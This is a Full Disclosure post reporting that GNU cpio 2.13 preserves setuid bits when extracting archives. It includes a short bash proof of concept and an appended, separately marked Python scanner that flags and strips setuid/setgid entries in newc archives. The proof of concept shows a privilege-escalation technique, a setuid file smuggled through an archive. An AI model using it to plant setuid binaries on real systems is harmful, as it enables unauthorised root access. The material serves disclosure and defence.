Message-ID: <CAGUWgD9riQmTGxPuecEC+9Owsn3cZK+n0mVy+wLC5rzrZx6y=g@mail.gmail.com>
Date: Mon, 8 Jan 2024 11:25:34 +0200
From: Georgi Guninski <gguninski@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] cpio privilege escalation vulnerability via setuid files in cpio archive

cpio privilege escalation vulnerability via setuid files in cpio archive

Happy New Year, let in 2024 happiness be with you! :)

When extracting archives, cpio (at least version 2.13) preserves the setuid flag, which might lead to privilege escalation.

One example is r00t extracts to /tmp/ and scidiot runs /tmp/micq/backd00r without further interaction from root.

We believe this is a vulnerability, since directory traversal in cpio is considered a vulnerability.

The POC is trivial, including a bash script.

====
#!/bin/bash
# cpio privilege escalation via setuid files in cpio archive
# author: Georgi Guninski
# date: Mon Jan 8 07:28:28 AM UTC 2024
# tested on cpio (GNU cpio) 2.13
mkdir -p /tmp/1
cd /tmp/1
# create an empty file and set the setuid bit on it (mode 4555)
touch a
chmod 4555 a
# pack it into a cpio archive
echo -n a | cpio -ocv0 > a.cpio
mkdir -p /tmp/2
cd /tmp/2
# extract it elsewhere: the setuid bit is preserved
cpio -iv < ../1/a.cpio
ls -lh /tmp/2/a
#-r-sr-xr-x. 1 joro joro 0 Jan 8 09:10 /tmp/2/a
====

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
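The defensive counterpart to the post above, as an added example that is not part of Georgi Guninski's message or of GNU cpio: a minimal reader and writer for the SVR4 "newc" cpio format (the one GNU cpio selects with -H newc, which -c also implies) that inspects the mode word of every entry and reports setuid/setgid files before anything is written to disk, plus the mode mask an extractor would apply to drop those bits. The archive it scans is constructed inline by the same module; the function and constant names are this example's own.

```python
# Added example (not from the post or from GNU cpio): scan a newc cpio
# archive for setuid/setgid entries before extraction.

NEWC_MAGIC = b"070701"
HEADER_LEN = 110          # 6-byte magic + 13 fields of 8 hex digits
S_ISUID, S_ISGID, S_IFREG = 0o4000, 0o2000, 0o100000
TRAILER = "TRAILER!!!"    # name of the mandatory final entry


def _pad4(n):
    """Bytes needed to round n up to a multiple of four (newc alignment)."""
    return (4 - n % 4) % 4


def newc_entry(name, mode, data=b"", ino=1):
    """Serialise one entry: header, NUL-terminated name, padding, data, padding."""
    name_bytes = name.encode("ascii") + b"\0"
    # field order: ino, mode, uid, gid, nlink, mtime, filesize,
    #              devmajor, devminor, rdevmajor, rdevminor, namesize, check
    fields = [ino, mode, 0, 0, 1, 0, len(data), 0, 0, 0, 0, len(name_bytes), 0]
    header = NEWC_MAGIC + "".join(f"{f:08X}" for f in fields).encode("ascii")
    body = header + name_bytes
    body += b"\0" * _pad4(len(body))
    body += data + b"\0" * _pad4(len(data))
    return body


def build_archive(entries):
    """entries: iterable of (name, mode, data). Appends the trailer entry."""
    out = b"".join(newc_entry(n, m, d, ino=i) for i, (n, m, d) in enumerate(entries, 1))
    return out + newc_entry(TRAILER, 0, b"", ino=0)


def iter_newc(archive):
    """Yield (name, mode, data) for every entry up to the trailer."""
    off = 0
    while off + HEADER_LEN <= len(archive):
        hdr = archive[off:off + HEADER_LEN]
        if hdr[:6] != NEWC_MAGIC:
            raise ValueError(f"bad newc magic at offset {off}")
        vals = [int(hdr[6 + 8 * i:14 + 8 * i], 16) for i in range(13)]
        mode, filesize, namesize = vals[1], vals[6], vals[11]
        name_start = off + HEADER_LEN
        name = archive[name_start:name_start + namesize - 1].decode("ascii")
        if name == TRAILER:
            return
        data_start = name_start + namesize
        data_start += _pad4(data_start - off)      # header+name padded to 4
        yield name, mode, archive[data_start:data_start + filesize]
        off = data_start + filesize + _pad4(filesize)
    raise ValueError("archive ended without a trailer")


def setid_flags(mode):
    """'setuid', 'setgid', 'setuid,setgid' or '' for a mode word."""
    return ",".join(n for bit, n in ((S_ISUID, "setuid"), (S_ISGID, "setgid")) if mode & bit)


def find_setid_entries(archive):
    """Entries whose mode carries setuid/setgid: refuse or sanitise these before extracting."""
    return [(name, mode, setid_flags(mode))
            for name, mode, _ in iter_newc(archive) if mode & (S_ISUID | S_ISGID)]


def strip_setid(mode):
    """Mode an extractor should apply if the bits must not survive extraction."""
    return mode & ~(S_ISUID | S_ISGID)


def build_sample_archive():
    """Constructed sample: one setuid file, one setgid file, one ordinary file."""
    return build_archive([
        ("a", S_IFREG | 0o4555, b""),                   # same mode as the PoC's /tmp/1/a
        ("bin/tool", S_IFREG | 0o2755, b"#!/bin/sh\n"),
        ("README", S_IFREG | 0o644, b"hello\n"),
    ])


if __name__ == "__main__":
    for name, mode, flags in find_setid_entries(build_sample_archive()):
        print(f"{name}: mode {mode & 0o7777:04o} ({flags}) "
              f"-> extract as {strip_setid(mode) & 0o7777:04o}")
```

The same check can be done with cpio itself before extracting an archive from an untrusted source: `cpio -itv < archive` lists each entry with an ls-style mode string, and an `s` in the owner or group execute position marks a setuid or setgid entry. If extraction has already happened, `find <dir> -perm /6000` locates the files that kept those bits.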